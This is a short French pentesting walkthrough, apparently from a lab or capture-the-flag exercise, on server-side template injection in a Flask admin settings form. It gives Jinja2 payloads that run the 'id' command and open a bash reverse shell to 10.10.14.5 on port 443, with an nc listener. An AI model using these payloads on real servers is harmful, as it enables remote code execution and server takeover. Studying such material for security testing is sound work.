SSTI (Flask) - Pentesting Web

Vulnérabilité SSTI:

Dans le sous-domaine, vous trouverez un onglet Settings où vous pouvez modifier les informations de l'utilisateur admin (nom complet, date de naissance et téléphone).

Si, dans le formulaire "nom complet", vous tentez d'exécuter une attaque SSTI, le serveur est vulnérable. Pour tester cela avec les {{ }}, essayons de voir s'il interprète le calcul :

{{1+1}}

Ensuite, nous allons exécuter des commandes (par exemple, id) :

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

On découvre qu'il est dans le groupe root.

Nous allons réaliser un reverse shell pour accéder au serveur

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('bash -c "bash -i >& /dev/tcp/10.10.14.5/443 0>&1"').read() }}

Nous nous mettons en écoute sur le port 443 sur notre machine d'attaque :

nc -nlvp 443

Mis à jour il y a 1 an

Ce contenu vous a-t-il été utile ?